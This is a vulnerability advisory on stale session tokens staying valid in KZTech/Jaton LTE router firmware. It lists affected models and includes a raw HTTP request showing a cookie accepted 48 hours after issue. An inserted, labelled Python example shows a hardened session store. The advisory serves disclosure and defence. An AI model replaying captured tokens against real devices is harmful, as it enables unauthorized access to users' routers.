KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: | |  
Affected version: Model     | Firmware  
                  ----------+------------  
                  JT3500V   | 2.0.1B1064  
                  JT3300V   | 2.0.1B1047  
                  AM6200M   | 2.0.0B3210  
                  AM6000N   | 2.0.0B3042  
                  AM5000W   | 2.0.0B3037  
                  AM4200M   | 2.0.0B2996  
                  AM4100V   | 2.0.0B2988  
                  AM3500MW  | 2.0.0B1092  
                  AM3410V   | 2.0.0B1085  
                  AM3300V   | 2.0.0B1060  
                  AM3100E   | 2.0.0B981  
                  AM3100V   | 2.0.0B946  
                  AM3000M   | 2.0.0B21  
                  KZ7621U   | 2.0.0B14  
                  KZ3220M   | 2.0.0B04  
                  KZ3120R   | 2.0.0B01  
Summary: The JT3500V is a highly advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high-speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multimedia data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high-performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual-band Wi-Fi, and advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution for SOHO or residential customers. It can  
deliver up to 1 Gbps maximum data throughput, which is competitive  
with wired broadband access service.  
Desc: The application suffers from insufficient session expiration.  
This occurs when the web application permits an attacker to reuse  
old session credentials or session IDs for authorization. Insufficient  
session expiration increases the device's exposure to attacks that  
steal or reuse a user's session identifiers, because a captured  
token remains usable long after the session should have ended.  
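The following is an added example, not code from the advisory, the vendor firmware, or GoAhead: a minimal server-side session store that enforces the two controls whose absence the advisory describes, an idle timeout and an absolute session lifetime. It reuses the advisory's cookie layout (`uid=token:<hex>`) and shows the same token being checked one minute and then 48 hours after issue. The timeout values, the class and function names, and the `cookie_token` helper are assumptions for illustration; passing `None` for both timeouts reproduces the never-expiring behaviour the advisory observed.

```python
"""Session store with idle and absolute expiration (added example, not the device's code)."""
import secrets
from dataclasses import dataclass
from typing import Optional

IDLE_TIMEOUT = 30 * 60            # assumed policy: 30 min without a request
ABSOLUTE_LIFETIME = 8 * 60 * 60   # assumed policy: 8 h after login, regardless of activity


@dataclass
class Session:
    user: str
    created: float     # seconds (monotonic or epoch) when the session was issued
    last_seen: float   # seconds of the last accepted request


class SessionStore:
    """Server-side store; a token is only valid while the store still holds it."""

    def __init__(self, idle_timeout: Optional[float] = IDLE_TIMEOUT,
                 absolute_lifetime: Optional[float] = ABSOLUTE_LIFETIME):
        # None for either value disables that check (the weak configuration)
        self.idle_timeout = idle_timeout
        self.absolute_lifetime = absolute_lifetime
        self._sessions: dict[str, Session] = {}

    def create(self, user: str, now: float) -> str:
        token = secrets.token_hex(16)   # 32 hex chars, same shape as the advisory's cookie
        self._sessions[token] = Session(user, now, now)
        return token

    def validate(self, token: Optional[str], now: float) -> Optional[str]:
        """Return the session's user, or None if the token is unknown or expired."""
        if token is None:
            return None
        s = self._sessions.get(token)
        if s is None:
            return None
        too_old = (self.absolute_lifetime is not None
                   and now - s.created > self.absolute_lifetime)
        too_idle = (self.idle_timeout is not None
                    and now - s.last_seen > self.idle_timeout)
        if too_old or too_idle:
            # Expire server-side: deleting the cookie in the browser is not enough,
            # since a captured copy of the token would otherwise keep working.
            del self._sessions[token]
            return None
        s.last_seen = now
        return s.user

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)


def cookie_token(cookie_header: str) -> Optional[str]:
    """Extract <hex> from a 'uid=token:<hex>' Cookie header value, as in the advisory."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "uid" and value.startswith("token:"):
            return value[len("token:"):]
    return None


def demo():
    """Check one token after 1 minute and after 48 hours (the advisory's interval)."""
    store = SessionStore()
    t0 = 0.0
    tok = store.create("admin", t0)
    header = f"uid=token:{tok}"            # constructed request cookie
    fresh = store.validate(cookie_token(header), t0 + 60)
    stale = store.validate(cookie_token(header), t0 + 48 * 3600)
    return fresh, stale


if __name__ == "__main__":
    print(demo())   # hardened store: ('admin', None)
    weak = SessionStore(idle_timeout=None, absolute_lifetime=None)
    t = weak.create("admin", 0.0)
    print(weak.validate(t, 48 * 3600))   # no expiry: 'admin' (the observed behaviour)
```

The store keys validity on its own table rather than on anything in the cookie, so a token that has expired (or been logged out) cannot be revived by a client that still presents it. Whichever of the two limits trips first wins; the absolute lifetime is what closes the gap the advisory shows, since periodic activity would otherwise keep an idle-only timeout from ever firing.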
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5646  
Advisory URL:  
Session still accepted 48 hours after issue (request, then response):  
GET /status.html HTTP/1.1  
Connection: keep-alive  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b  

HTTP/1.0 200 OK  
Date: Thu Feb 11 00:29:39 2021  
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Pragma: no-cache  
Cache-Control: no-cache  
Content-type: text/html